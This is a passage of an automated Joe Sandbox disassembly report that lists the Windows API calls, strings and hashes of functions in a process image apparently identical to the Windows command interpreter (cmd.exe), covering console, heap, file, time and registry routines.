                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27F9E
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27FFF
                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28020
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28036
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28061
                              • RtlFreeHeap.NTDLL ref: 00007FF744F28075
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F280D6
                              • RtlFreeHeap.NTDLL ref: 00007FF744F280EA
                              • _wcsnicmp.MSVCRT ref: 00007FF744F28177
                              • _wcsnicmp.MSVCRT ref: 00007FF744F2819A
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281BD
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281DC
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281FB
                              • _wcsnicmp.MSVCRT ref: 00007FF744F2821A
                              • _wcsnicmp.MSVCRT ref: 00007FF744F28239
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28291
                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F282D7
                              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F282FB
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F2831A
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28364
                              • RtlFreeHeap.NTDLL ref: 00007FF744F28378
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F2839A
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F283AE
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F283E6
                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28403
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28418
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                              • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                              • API String ID: 3637805771-3100821235
                              • Opcode ID: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                              • Instruction ID: bdbd9e565c051ae0c14a6602d3bc232970382b21f3ade09fb21be2aee44fa69e
                              • Opcode Fuzzy Hash: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                              • Instruction Fuzzy Hash: 50E15D31A0CA52CBE710BF66A484179FAA1FB49B95BC89234CD1E537D8DF3DA405E720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                              • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                              • API String ID: 388421343-2905461000
                              • Opcode ID: 91aa278bae488f07ca69690407c5ac2f944185e63ade342298008147df7553ae
                              • Instruction ID: 5f55e176528d11ecf72b878e2fb3b1a585c613e1708ae77f08e6ae228aaec5b3
                              • Opcode Fuzzy Hash: 91aa278bae488f07ca69690407c5ac2f944185e63ade342298008147df7553ae
                              • Instruction Fuzzy Hash: E5F1FD32A0DA82C6E760BF12A4857BAF7A4FB85744F885135DE4D426D9DF3CE844DB20
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                              • String ID: DPATH
                              • API String ID: 95024817-2010427443
                              • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                              • Instruction ID: fdf1c9d199881771c3676fd1c97f271bcde98bc2271fcff13a2e8f64a7f1daab
                              • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                              • Instruction Fuzzy Hash: BD129232A0C682C6E764BF169480179F6A1FB89B54F885235EE4E577DCDF7DE8009B10
                              APIs
                              • _wcsupr.MSVCRT ref: 00007FF744F2EF33
                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EF98
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFA9
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFBF
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF744F2EFDC
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFED
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F003
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F022
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F083
                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F092
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F0A5
                              • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF744F2F0DB
                              • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F135
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F16C
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F185
                                • Part of subcall function 00007FF744F101B8: _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                                • Part of subcall function 00007FF744F101B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                              • String ID: <noalias>$CMD.EXE
                              • API String ID: 1161012917-1690691951
                              • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                              • Instruction ID: 8e4a8cec4821cebf0119f23b162a3bddd5efd156707fcef8d8f470724f2b7f88
                              • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                              • Instruction Fuzzy Hash: 20918122B0C652CAFB14BF62E4801BDAAA0BF49B55FDC4135DE0E526DDDF3DA445A230
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                              • String ID: %02d%s%02d%s%02d$%s $%s %s
                              • API String ID: 1795611712-4023967598
                              • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                              • Instruction ID: 00a7122d976a6dfdab02d3af5810ad778b63ba1105f0c3b544aed07b623874f4
                              • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                              • Instruction Fuzzy Hash: F0E18E21A0CA42C6EB10BF67A8855B9E6A1FB88784FD84131DE4E576DDDE3CE504A360
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                              • String ID: \\?\
                              • API String ID: 628682198-4282027825
                              • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                              • Instruction ID: 7d174f70306791720fd56abefa33272099d4dcb233ab988f4dc7361472fbd2b7
                              • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                              • Instruction Fuzzy Hash: B0E1A122A0CA82C6EB64BF22D9942F9A3A0FB85749F885135DE0E477D8DF3CE545D310
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                              • String ID:
                              • API String ID: 3935429995-0
                              • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                              • Instruction ID: cb51bb44a9ca32ddad11f678f595a0e95cf7b92bd1ee9cd79aad57f1cc0df176
                              • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                              • Instruction Fuzzy Hash: C461AD26A0C652C7E750FF22A58457AFBA4FB89F55F898134DE4A43798DF3CD401A710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Time$File$System$FormatInfoLocalLocale
                              • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                              • API String ID: 55602301-695310191
                              • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                              • Instruction ID: 7dde6f2d5a9dd0fd39fb38a2ea79c0409b202d777f4e787c1d088ec93709e775
                              • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                              • Instruction Fuzzy Hash: 5CA16D22A1C642D6FB10BF12E4802BAA7B5FB94754F980135EE5E436D8EF3CE944E710
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                              • Instruction ID: a94f878ba3252cfc79afc96fd8d4d9737a5a035d82f4768fec7cb432b4138c53
                              • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                              • Instruction Fuzzy Hash: F891F23260CA82C6EB24BF66D5902FDB6A0FB85746F884131DE4E467D8DF3DD544E220
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorFileFindFirstLast
                              • String ID:
                              • API String ID: 873889042-0
                              • Opcode ID: 11074d3c224ce67514852d4966aba4998422fc44b58f31243b65843f6fe49b86
                              • Instruction ID: 4d970e029669f59d066a17517b83e3c43bfb6b9470c017bb9cec167c1c2c28f4
                              • Opcode Fuzzy Hash: 11074d3c224ce67514852d4966aba4998422fc44b58f31243b65843f6fe49b86
                              • Instruction Fuzzy Hash: B4510675A0DB82C6E700BF12A584579BBA0FB59B91FDCA135CE5D43398CF3CE854A620
                              APIs
                              • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AA85
                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AACF
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AAEC
                              • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2AB39
                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2AB6F
                              • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2ABA4
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2ABCB
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseDeleteValue$CreateOpen
                              • String ID: %s=%s
                              • API String ID: 1019019434-1087296587
                              • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                              • Instruction ID: 9d44f525145640c7b39c463dc3ad528ab05c914b5cfee0453faf2141285b556a
                              • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                              • Instruction Fuzzy Hash: 4A519331B0CB52C6E760BF66A48476AB6A1FB89790F884234CE5D83BD8DF39D441D710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                              • String ID: %9d
                              • API String ID: 1006866328-2241623522
                              • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                              • Instruction ID: eb09f090510d4698a4e6352788c1364ff7fa4911b5ddc402d08d82a212640135
                              • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                              • Instruction Fuzzy Hash: 11516E72A0C642CAE700FF52A8845A9BBA0FB44764FC94635DE6D537D9CF3CE544AB20
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp
                              • String ID: GeToken: (%x) '%s'
                              • API String ID: 2081463915-1994581435
                              • Opcode ID: e3a6cb9c4f4fe1a277f0a8ebff47e1c814c31c2abc96469986f3b1ea96a28bad
                              • Instruction ID: e4cfa7019165d66532d251d3522cb9514d7b272bac0d6f968ef544af81e608a6
                              • Opcode Fuzzy Hash: e3a6cb9c4f4fe1a277f0a8ebff47e1c814c31c2abc96469986f3b1ea96a28bad
                              • Instruction Fuzzy Hash: 23719A20E0D256C6FB64BF67A8C8275A6A0EF90740FCC4539DE1D426EDDF3CB481A621
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp$iswspacewcschr
                              • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                              • API String ID: 840959033-3627297882
                              • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                              • Instruction ID: a7a3926cad63f622b5e07480e75fbd687ff7b18a33b747467252705f04ca9a4a
                              • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                              • Instruction Fuzzy Hash: CCD11921A0C653C6FB50BF63A8C52B9A6A0AF54B44FCC5035DE4D466EEDE3CE905A730
                              APIs
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
